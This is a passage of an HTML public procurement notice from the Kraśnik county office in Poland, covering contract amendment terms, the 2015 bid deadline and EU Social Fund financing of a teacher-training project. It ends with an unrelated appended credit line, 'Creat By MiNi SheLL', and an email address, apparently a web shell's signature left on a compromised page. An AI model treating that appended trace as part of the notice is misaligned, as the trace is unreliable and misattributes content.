c) w sytuacji zmiany terminu wykonania przedmiotu umowy,
3) Wysokości wynagrodzenia:
a) zmiana obowiązujących stawek podatku VAT,
c) zmiany w przepisach prawa mające wpływ na wysokość wynagrodzenia;
2. Wszelkie zmiany umowy wymagają zachowania formy pisemnej pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.powiatkrasnicki.pl, www.powiatkrasnik.bip.lublin.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Kraśniku, Al. Niepodległości 20, 23-210 Kraśnik.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.02.2015 godzina 09:00, miejsce: Starostwo Powiatowe w Kraśniku, Al. Niepodległości 20, 23-210 Kraśnik, pok. 101, sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt pn. Kompleksowy system doskonalenia nauczycieli w powiecie kraśnickim, współfinansowany przez Unię Europejską ze środków Europejskiego
Funduszu Społecznego, w ramach Programu Operacyjnego Kapitał Ludzki, Działanie 3.5 Kompleksowe wspomaganie rozwoju szkół..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com